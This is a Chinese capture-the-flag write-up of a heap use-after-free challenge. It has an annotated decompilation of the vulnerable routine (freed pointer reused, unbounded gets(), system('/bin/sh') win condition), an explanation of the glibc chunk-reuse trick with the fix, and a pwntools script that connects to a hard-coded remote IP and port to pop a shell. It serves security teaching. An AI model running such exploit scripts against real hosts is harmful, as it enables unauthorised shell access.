pwn-堆(use-after-free,UAF)

heap_Easy_Uaf

IDA 反编译

/*
 * Are() - IDA decompilation of the challenge routine; shows a heap
 * use-after-free (CWE-416).
 *
 * Flow as listed: allocate a 0x68-byte chunk `a`, copy "Flag" into it, free
 * it, then allocate a second chunk `b` of a caller-chosen size and fill it
 * with gets(). `a` is never cleared after free() and is read again by
 * strncmp(); when that comparison matches, the function runs /bin/sh.
 *
 * Returns the strncmp() result, or the system() status when the compare
 * matches.
 */
int __cdecl Are()
{
  int result; // eax
  int size; // [rsp+4h] [rbp-1Ch] BYREF
  char *a; // [rsp+8h] [rbp-18h]
  char *b; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  // Presumably the stack-protector canary load (fs:0x28); the matching
  // check is not shown in this listing.
  v4 = __readfsqword(0x28u);
  // 0x68 == 104 bytes. The return value is not checked before strcpy().
  a = (char *)malloc(0x68uLL);
  strcpy(a, "Flag");
  // `a` keeps the freed address after this call (dangling pointer); it is
  // never reset to NULL, which is the root cause of the later stale read.
  free(a);
  size = 0;
  puts("Please Input Chunk size :");
  // The scanf() result is ignored; `size` stays 0 if the input does not parse.
  __isoc99_scanf("%d", &size);
  getchar();
  // `size` is a signed int converted to malloc()'s unsigned size argument, so
  // a negative input becomes a very large request; the result is not checked
  // for NULL before gets() writes through it.
  // NOTE(review): when this request falls in the same size class as the chunk
  // freed above, allocators such as glibc typically hand that chunk back, so
  // `b` may alias `a` - confirm against the target libc.
  b = (char *)malloc(size);
  puts("Please Input Content : ");
  // gets() has no length bound: input longer than the chunk overflows the
  // heap buffer (CWE-787) regardless of `size`. A bounded read is the fix.
  gets(b);
  // Use-after-free read: `a` was freed above, so the outcome depends on
  // whatever now occupies that memory.
  result = strncmp(a, "Flag", 4uLL);
  if ( !result )
    // Win condition of the challenge, reachable only through the stale-pointer
    // compare above.
    return system("/bin/sh");
  return result;
}

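脚本(原理:a 在 free 之后没有置空,仍指向已释放的堆块;随后申请同样大小 0x68 = 104 字节的 b,glibc 通常会把刚释放的这块内存重新分配出来,于是向 b 写入 "Flag" 就等于改写了 a 指向的内容,strncmp 的比较随之通过。修复思路:free 后立即将指针置 NULL,并把 gets 换成带长度限制的读取):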

from pwn import *
# Open a TCP connection to the challenge service named in the write-up.
conn = remote("1.95.36.136", 2061)

# Lines sent in order:
#   b'5'    - presumably a menu choice that reaches Are(); the menu itself is
#             not part of the decompiled listing, so confirm against the binary.
#   b"104"  - answer to the chunk-size prompt; 104 == 0x68, the size of the
#             chunk that Are() allocated and freed just before.
#   b'Flag' - answer to the content prompt; these are the 4 bytes that
#             strncmp() later reads back through the stale pointer `a`.
for payload in (b'5', b"104", b'Flag'):
    conn.sendline(payload)

# Hand the session over to the terminal once the inputs are delivered.
conn.interactive()
